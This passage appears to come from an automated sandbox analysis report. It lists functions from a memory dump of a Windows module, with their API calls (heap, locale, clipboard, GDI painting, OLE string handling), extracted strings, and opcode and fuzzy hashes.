Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: feeda506f9c5f0219421911e60057de17496feb84035b8e2b3dd60ae1d06eb66
Instruction ID: 99dd835f4f69cd3c616cf4d2adc0966f902220c9d2497a07147b9615ecd8a235
Opcode Fuzzy Hash: feeda506f9c5f0219421911e60057de17496feb84035b8e2b3dd60ae1d06eb66
Instruction Fuzzy Hash: 8AF090B6005704CFE3249F11D881B92B7F8FF04765F10882EE29A9BA91CB76F854CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6F1A9BD2, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6F198F9C,00000105,000000FF,24448D6F,00000000,?,6F181687,?,00000103,000000FF), ref: 6F1A9C04

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 406380e2a814f0542eb71b336151226076d033bfbd6f477e2a1f018cbd9929c2
Instruction ID: beae318510f85985e5de1edc146ba9cacf55b502ec608d3f401158baef6c8820
Opcode Fuzzy Hash: 406380e2a814f0542eb71b336151226076d033bfbd6f477e2a1f018cbd9929c2
Instruction Fuzzy Hash: 80E02B39180B28AAFB1157798D60B8A36A89F133F0F910121DC18965CCCF73F4F086E8

Uniqueness

Uniqueness Score: -1.00%

Function 031317CB, Relevance: 1.3, APIs: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 0313188D

Memory Dump Source

Source File: 00000003.00000002.457630299.0000000003120000.00000040.00000001.sdmp, Offset: 03120000, based on PE: true

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: c1c077e33530d49d11da9abea9ebb279affe24fbd5e498c6618313e729dc48f6
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 2C2127B5D0020CFFDB04DFA4C94A9EEBBB4EB44304F108189E425B7240E3B56B149FA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6F18F700, Relevance: 37.2, APIs: 18, Strings: 3, Instructions: 404stringmemoryCOMMON

Download Yara Rule

APIs

CoTaskMemAlloc.OLE32(6F18ED98,1E3BCBB0,00000000,00000000), ref: 6F18F79A
CharNextW.USER32(?,00000000), ref: 6F18F819
CharNextW.USER32(00000000,?,00000000), ref: 6F18F81E
CharNextW.USER32(00000000,?,00000000), ref: 6F18F823
CharNextW.USER32(00000000,?,00000000), ref: 6F18F828
CharNextW.USER32(?,?,1E3BCBB0,00000000,00000000), ref: 6F18F85F
CharNextW.USER32(?,?,1E3BCBB0,00000000,00000000), ref: 6F18F86F
CharNextW.USER32(00000000,?,1E3BCBB0,00000000,00000000), ref: 6F18F8CE
CoTaskMemFree.OLE32(00000000,1E3BCBB0,00000000,00000000), ref: 6F18F8F3
lstrcmpiW.KERNEL32(?,?,?,1E3BCBB0,00000000,00000000), ref: 6F18F94E
CoTaskMemFree.OLE32(00000000,?,1E3BCBB0,00000000,00000000), ref: 6F18F966
CharNextW.USER32(?,?,1E3BCBB0,00000000,00000000), ref: 6F18F9B3
CharNextW.USER32(?,1E3BCBB0,00000000,00000000), ref: 6F18F9C3
CoTaskMemFree.OLE32(00000000,?,1E3BCBB0,00000000,00000000), ref: 6F18F9E5
CoTaskMemFree.OLE32(00000000,1E3BCBB0,00000000,00000000), ref: 6F18FA03
lstrcmpiW.KERNEL32(?,6F1C8D3C,?,?,C000008C,00000000,00000000), ref: 6F18FABD
CoTaskMemFree.OLE32(00000000,C000008C,00000000,00000000), ref: 6F18FADC
CharNextW.USER32(?,?,00000000,00000000,00000000,?,?,C000008C,00000000,00000000), ref: 6F18FBA1

Strings

HKCU{Software{Classes, xrefs: 6F18F82A
}}, xrefs: 6F18F8B0
HKCR, xrefs: 6F18F800

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Task$Free$lstrcmpi$Alloc
String ID: }}$HKCR$HKCU{Software{Classes
API String ID: 2337762536-1142484189
Opcode ID: c1caa695d77ff9d4b8f04f39f68d5842ba6c246c6ad7779480e87e99d9911fb0
Instruction ID: 781731208383d370b7d6a1210654cc5400b71c04ddfa745141c2ea267e7e9399
Opcode Fuzzy Hash: c1caa695d77ff9d4b8f04f39f68d5842ba6c246c6ad7779480e87e99d9911fb0
Instruction Fuzzy Hash: 70E1C135900359DFEB109FA8CA9479EB7B4EF16394F10416AE935EB284EB30A964CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F191CD0, Relevance: 26.7, APIs: 12, Strings: 3, Instructions: 462COMMON

Download Yara Rule

APIs

PdhCollectQueryData.PDH(?,1E3BCBB0,?,?,?,?,6F1B9DAB,000000FF), ref: 6F191D77
PdhGetFormattedCounterValue.PDH(?,00000200,00000000,?,?,?,6F1B9DAB,000000FF), ref: 6F191DE1
GetTextMetricsW.GDI32(?,?,00000010,?), ref: 6F191F40
GetClientRect.USER32 ref: 6F19224B
GetDeviceCaps.GDI32(?,0000005A), ref: 6F1922C0
MulDiv.KERNEL32(?,00000000,00000048), ref: 6F1922D5
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 6F1922FA
SetTextColor.GDI32(?,?), ref: 6F192312
SelectObject.GDI32(?,00000000), ref: 6F19231A
DrawTextW.USER32(?,?,?,?,00000000), ref: 6F192356
SelectObject.GDI32(?,00000000), ref: 6F192363
DeleteObject.GDI32(00000000), ref: 6F19236A

Strings

%s%s%s, xrefs: 6F1921F2
[N/A], xrefs: 6F192117
%s%d.%d%s, xrefs: 6F192198

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectText$Select$CapsClientCollectColorCounterCreateDataDeleteDeviceDrawFontFormattedMetricsQueryRectValue
String ID: %s%d.%d%s$%s%s%s$[N/A]
API String ID: 4229994797-711029782
Opcode ID: 63879ba1dea9d3181cceb7e5e452ec22892f72ef2219f9f1d9f483c78d3f4aa1
Instruction ID: 79b400393478dc686263169434fe2bee906b7b7febe23674e952136164f7186d
Opcode Fuzzy Hash: 63879ba1dea9d3181cceb7e5e452ec22892f72ef2219f9f1d9f483c78d3f4aa1
Instruction Fuzzy Hash: 1E1269719006299FDB24CF28CC80ADAB7B9FF59344F4542D9E509A72A1D730AEE4CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6F185EE0, Relevance: 19.9, APIs: 13, Instructions: 427threadclipboardCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?,0000002E,00000000,?,?,?,?,?,?,6F186935), ref: 6F186183
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F1861A1
AnyPopup.USER32 ref: 6F186305
GetCurrentThread.KERNEL32 ref: 6F186401

Part of subcall function 6F185A30: IsSystemResumeAutomatic.KERNEL32 ref: 6F185BA0

GetUserDefaultUILanguage.KERNEL32(00000000,?,0000002E,00000000,?,?,?,?,?,?,6F186935), ref: 6F186355

Part of subcall function 6F185A30: GetOpenClipboardWindow.USER32(00000000,?,00000000,6F186431,0000002E,00000000,00000000,?,0000002E,00000000), ref: 6F185A3C
Part of subcall function 6F185A30: CloseClipboard.USER32 ref: 6F185A73
Part of subcall function 6F185A30: GetMenuCheckMarkDimensions.USER32 ref: 6F185B30

GetErrorMode.KERNEL32(0000002E,00000000,?,?,?,?,?,?,6F186935), ref: 6F186448
GetThreadErrorMode.KERNEL32(?,?,?,?,?,?,6F186935), ref: 6F1864B0
GetClipboardViewer.USER32 ref: 6F185F76

Part of subcall function 6F185C20: UnregisterApplicationRestart.KERNEL32 ref: 6F185C40
Part of subcall function 6F185C20: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F185CAC

GetSystemDefaultLangID.KERNEL32 ref: 6F185FE3
GetOpenClipboardWindow.USER32(?,-00000003,00000000,?,?,?,?,?,?,6F186935), ref: 6F186052
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F186081
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F186108
GetCurrentThread.KERNEL32 ref: 6F18612E

Part of subcall function 6F185D90: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F185E04
Part of subcall function 6F185D90: SwitchToThread.KERNEL32(00000000,?,?,?,?,?,?), ref: 6F185E74
Part of subcall function 6F185D90: GetOpenClipboardWindow.USER32(00000000,?,?,?), ref: 6F185E93
Part of subcall function 6F185D90: GetACP.KERNEL32(00000000,?,?,?), ref: 6F185EA4

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardUnothrow_t@std@@@__ehfuncinfo$??2@$ThreadWindow$Open$CurrentDefaultErrorModeSystem$ApplicationAutomaticCheckCloseDimensionsForegroundLangLanguageMarkMenuPopupRestartResumeSwitchUnregisterUserViewer
String ID:
API String ID: 2542842856-0
Opcode ID: 6c04fe3a3db3fdd4091c89d6c2706453d5a53b6197bdbbeff7671fe5c135c1cb
Instruction ID: c41418a757e702dc60b091c61ec05903bc3894586131a5bf959630e53f884654
Opcode Fuzzy Hash: 6c04fe3a3db3fdd4091c89d6c2706453d5a53b6197bdbbeff7671fe5c135c1cb
Instruction Fuzzy Hash: 43E11B31D24F494BC203DE36845115BF7ABAFEB6E8F44871AF446B6192FB2478F29940

Uniqueness

Uniqueness Score: -1.00%

Function 6F19849D, Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,6F1983B9,00000000,?,6F198550,00000000), ref: 6F19849F
GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,0000000C,6F1983B9,00000000,?,6F198550,00000000), ref: 6F1984C5
HeapAlloc.KERNEL32(00000000), ref: 6F1984CC
InitializeSListHead.KERNEL32(00000000), ref: 6F1984D9
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F1984EE
HeapFree.KERNEL32(00000000), ref: 6F1984F5

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
String ID:
API String ID: 1475849761-0
Opcode ID: 51f790046f50ebd0b20237a7e856a323deebb9e88d4804c7fd1657b2fe120e89
Instruction ID: ba3b33540154bf7aca793b1111dbd4b47b763a68f18a9973c604f51fa910d193
Opcode Fuzzy Hash: 51f790046f50ebd0b20237a7e856a323deebb9e88d4804c7fd1657b2fe120e89
Instruction Fuzzy Hash: F9F06231204A01DBEB00DF789C48B1676B8BFA67F9F00442DF985D7680EF34E4218A90

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B5F10, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,6F1B622F,?,00000000), ref: 6F1B5FA9
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,6F1B622F,?,00000000), ref: 6F1B5FD2
GetACP.KERNEL32(?,?,6F1B622F,?,00000000), ref: 6F1B5FE7

Strings

OCP, xrefs: 6F1B5F64
ACP, xrefs: 6F1B5F2E

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 46a08bd7cf84698e061dcd0e4da70c246fa7aef924954003964fdca4d773faf2
Instruction ID: bd8238599e7f71d50667c85bde327c582caf729e5e48f356ed38b01a9cb191b8
Opcode Fuzzy Hash: 46a08bd7cf84698e061dcd0e4da70c246fa7aef924954003964fdca4d773faf2
Instruction Fuzzy Hash: E4219222644104EBE7188F2DC904EC7F3B6AF65BE6B56856DE909DB508FF32E960C350

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B60E4, Relevance: 7.7, APIs: 5, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 6F1AA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6F19ED16,6F1CD0A0,0000000C,00000004,00000001,00000004,?,6F184865,00000000,00000000), ref: 6F1AA298
Part of subcall function 6F1AA294: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6F184865,00000000,00000000), ref: 6F1AA33C
Part of subcall function 6F1AA294: _abort.LIBCMT ref: 6F1AA342

Part of subcall function 6F1AA294: _free.LIBCMT ref: 6F1AA2EF

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6F1B61F0
IsValidCodePage.KERNEL32(00000000), ref: 6F1B624B
IsValidLocale.KERNEL32(?,00000001), ref: 6F1B625A
GetLocaleInfoW.KERNEL32(?,00001001,6F1AB71F,00000040,?,6F1AB83F,00000055,00000000,?,?,00000055,00000000), ref: 6F1B62A2
GetLocaleInfoW.KERNEL32(?,00001002,6F1AB79F,00000040), ref: 6F1B62C1

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser_abort_free
String ID:
API String ID: 1247548202-0
Opcode ID: 391f2eacb1cf50831837ee332fdc757901cb6ed5cacbfe9fd52d38bc6f02fe6d
Instruction ID: 633a93fc470fce55db3e79d324d3dee2f51fc93845bbbb1015483ddedb5cdd5f
Opcode Fuzzy Hash: 391f2eacb1cf50831837ee332fdc757901cb6ed5cacbfe9fd52d38bc6f02fe6d
Instruction Fuzzy Hash: 8E517671900609DFEF00DFA9CC44AEE77B9BF6A784F0445AEE524D7180E771A9248B61

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B57AC, Relevance: 6.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 6F1AA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6F19ED16,6F1CD0A0,0000000C,00000004,00000001,00000004,?,6F184865,00000000,00000000), ref: 6F1AA298
Part of subcall function 6F1AA294: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6F184865,00000000,00000000), ref: 6F1AA33C
Part of subcall function 6F1AA294: _abort.LIBCMT ref: 6F1AA342

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6F1AB726,?,?,?,?,6F1AB318,?,00000004), ref: 6F1B588E
_wcschr.LIBVCRUNTIME ref: 6F1B591E
_wcschr.LIBVCRUNTIME ref: 6F1B592C
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6F1AB726,00000000,6F1AB846), ref: 6F1B59CF

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort
String ID:
API String ID: 4244957817-0
Opcode ID: f717f3a2d246ff143233e3dfc30da81fef4e4353d2a87a431eedea5b8ecafb17
Instruction ID: 75195f66af65e3598008b58a0efc36e19ed410d271021469bece6d48cd2d9564
Opcode Fuzzy Hash: f717f3a2d246ff143233e3dfc30da81fef4e4353d2a87a431eedea5b8ecafb17
Instruction Fuzzy Hash: 78610771600706EBEB149B3ACC81AAA77A8EF097D4F14052EE915DB1C4EB70F960C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6F195239, Relevance: 6.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,6F195358,6F1BB3CC,00000017), ref: 6F19523E
UnhandledExceptionFilter.KERNEL32(6F1BB3CC,?,6F195358,6F1BB3CC,00000017), ref: 6F195247
GetCurrentProcess.KERNEL32(C0000409,?,6F195358,6F1BB3CC,00000017), ref: 6F195252
TerminateProcess.KERNEL32(00000000,?,6F195358,6F1BB3CC,00000017), ref: 6F195259

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: f8d5530801d5c55b57fd19c1a79067a2b131d132db9264088de7a087ad964439
Instruction ID: b005efa6ec45e4e49b06e1aa789869c76a7e9dfeb93311700fd4c9af98cedb7c
Opcode Fuzzy Hash: f8d5530801d5c55b57fd19c1a79067a2b131d132db9264088de7a087ad964439
Instruction Fuzzy Hash: 49D00272044A08EBDE50ABE5E98DA9D3F28EB0A7AAF004410FB0AD6851DB7254618B65

Uniqueness

Uniqueness Score: -1.00%

Function 6F189BA0, Relevance: 40.7, APIs: 20, Strings: 3, Instructions: 424memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6F189CDA
VariantCopy.OLEAUT32(?,?), ref: 6F189CE8
SysFreeString.OLEAUT32(00000000), ref: 6F189D30
SysFreeString.OLEAUT32(-00000001), ref: 6F189DC2
VariantClear.OLEAUT32(?), ref: 6F189DF7
SysFreeString.OLEAUT32(-00000001), ref: 6F189E16
SysFreeString.OLEAUT32(00000000), ref: 6F189E47
SysFreeString.OLEAUT32(00000000), ref: 6F189E60
MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 6F189EE4
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6F189EEE
MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 6F189F0B
VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6F189F28
SysFreeString.OLEAUT32(00000000), ref: 6F189F37
SysFreeString.OLEAUT32(00000000), ref: 6F189FBB
SysFreeString.OLEAUT32(00000000), ref: 6F189FFF
_com_issue_error.COMSUPP ref: 6F18A041
_com_issue_error.COMSUPP ref: 6F18A04B
_com_issue_error.COMSUPP ref: 6F18A051
_com_issue_error.COMSUPP ref: 6F18A05B
SysFreeString.OLEAUT32(75C6D5B0), ref: 6F18A061

Strings

lines, xrefs: 6F189EDB, 6F189F02
offsetY, xrefs: 6F189CF6
!, xrefs: 6F18A00A

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$_com_issue_error$Variant$ByteCharMultiWide$AllocBstrClearCopyInit
String ID: !$lines$offsetY
API String ID: 2214081791-1236976741
Opcode ID: f7534e8b5d3ca19121d4bdec1cef7dcfc236ed808c0ec82b690f2fe8726bfcda
Instruction ID: b425101c52c97dde8d1189581edd14ec04344e651b0a7abb46857e1eef897318
Opcode Fuzzy Hash: f7534e8b5d3ca19121d4bdec1cef7dcfc236ed808c0ec82b690f2fe8726bfcda
Instruction Fuzzy Hash: 2FF19170A0020ADFEB10CFA4CA54BDEBBB8AF15B94F104159E425BB284D735E915CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 6F1891C0, Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 343COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 6F189296
VariantInit.OLEAUT32(?), ref: 6F1892ED
VariantCopy.OLEAUT32(?,?), ref: 6F1892FB
_com_issue_error.COMSUPP ref: 6F189563
_com_issue_error.COMSUPP ref: 6F18956D
_com_issue_error.COMSUPP ref: 6F189577
_com_issue_error.COMSUPP ref: 6F18957D
_com_issue_error.COMSUPP ref: 6F189587
_com_issue_error.COMSUPP ref: 6F189591

Strings

name, xrefs: 6F189248
page, xrefs: 6F1899EB, 6F189A16
counter, xrefs: 6F18963B, 6F189666
value, xrefs: 6F1893D0

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error$Variant$CopyFreeInitString
String ID: counter$name$page$value
API String ID: 2858117124-1733285648
Opcode ID: 45b7cd801d8b7108d726c999d77fb1aa404ef6e7920646a8aeb8a60243a6ced6
Instruction ID: d297980f55bfa0de8e73b474a9be447b9ab068d6147a823fd95ea257646433d5
Opcode Fuzzy Hash: 45b7cd801d8b7108d726c999d77fb1aa404ef6e7920646a8aeb8a60243a6ced6
Instruction Fuzzy Hash: 68C1C370A01605DBEB10CFA4CA64BDFB7B8AF21B54F54415DE825AB284DB34F914CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F1923F0, Relevance: 31.7, APIs: 21, Instructions: 183windowCOMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 6F1924A3
GetParent.USER32(?), ref: 6F1924AC
GetClientRect.USER32 ref: 6F1924C2
CreateCompatibleDC.GDI32(?), ref: 6F1924C8
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6F1924EA
SelectObject.GDI32(00000000,00000000), ref: 6F1924F6
SelectObject.GDI32(00000000,?), ref: 6F192508
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6F192521
SendMessageW.USER32(?,0000000F,?,00000000), ref: 6F19252F
SetBkMode.GDI32(?,00000001), ref: 6F192538
SetTextColor.GDI32(?,00FFFFFF), ref: 6F192544
GetClientRect.USER32 ref: 6F192556
ClientToScreen.USER32(?,?), ref: 6F192564
ClientToScreen.USER32(?,?), ref: 6F192579
ClientToScreen.USER32(?,?), ref: 6F19259B
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6F1925FD
SelectObject.GDI32(?,?), ref: 6F192608
SelectObject.GDI32(?,?), ref: 6F192613
DeleteObject.GDI32(?), ref: 6F19261D
DeleteDC.GDI32(?), ref: 6F192624
EndPaint.USER32(?,?), ref: 6F192632

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSend$BeginBitmapColorModeParentText
String ID:
API String ID: 2796758630-0
Opcode ID: 5e69e816b3f48245762dd5d5f917af15bb5d0302a6be6f51dbb4cc053f581ac5
Instruction ID: 8f3fed75d52a98d0a5be8ceecdb42dc3e2035541538178c712b01a0104495907
Opcode Fuzzy Hash: 5e69e816b3f48245762dd5d5f917af15bb5d0302a6be6f51dbb4cc053f581ac5
Instruction Fuzzy Hash: 6B614C71104B01EFDB20DF64C948B6FBBF8FF89350F004A1DF6A5926A0DB75A9158B92

Uniqueness

Uniqueness Score: -1.00%

Function 6F192460, Relevance: 31.6, APIs: 21, Instructions: 141windowCOMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 6F1924A3
GetParent.USER32(?), ref: 6F1924AC
GetClientRect.USER32 ref: 6F1924C2
CreateCompatibleDC.GDI32(?), ref: 6F1924C8
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6F1924EA
SelectObject.GDI32(00000000,00000000), ref: 6F1924F6
SelectObject.GDI32(00000000,?), ref: 6F192508
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6F192521
SendMessageW.USER32(?,0000000F,?,00000000), ref: 6F19252F
SetBkMode.GDI32(?,00000001), ref: 6F192538
SetTextColor.GDI32(?,00FFFFFF), ref: 6F192544
GetClientRect.USER32 ref: 6F192556
ClientToScreen.USER32(?,?), ref: 6F192564
ClientToScreen.USER32(?,?), ref: 6F192579
ClientToScreen.USER32(?,?), ref: 6F19259B
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6F1925FD
SelectObject.GDI32(?,?), ref: 6F192608
SelectObject.GDI32(?,?), ref: 6F192613
DeleteObject.GDI32(?), ref: 6F19261D
DeleteDC.GDI32(?), ref: 6F192624
EndPaint.USER32(?,?), ref: 6F192632

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSend$BeginBitmapColorModeParentText
String ID:
API String ID: 2796758630-0
Opcode ID: 89841314471f4757b836b04edbf9f93e92d1f8cf6b750b53664c2b78ff70c01a
Instruction ID: cc768d28aa7771ede610e81a38c85cdda4e73d824dcb80b267c41b00731ba911
Opcode Fuzzy Hash: 89841314471f4757b836b04edbf9f93e92d1f8cf6b750b53664c2b78ff70c01a
Instruction Fuzzy Hash: 85512671009701EFDB20DF65C848A6FBBF8FF89350F00491DF6A5922A0DB71A825CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6F1A7B6C, Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6F1A7BDC
_free.LIBCMT ref: 6F1A7BF2
_free.LIBCMT ref: 6F1A7C03
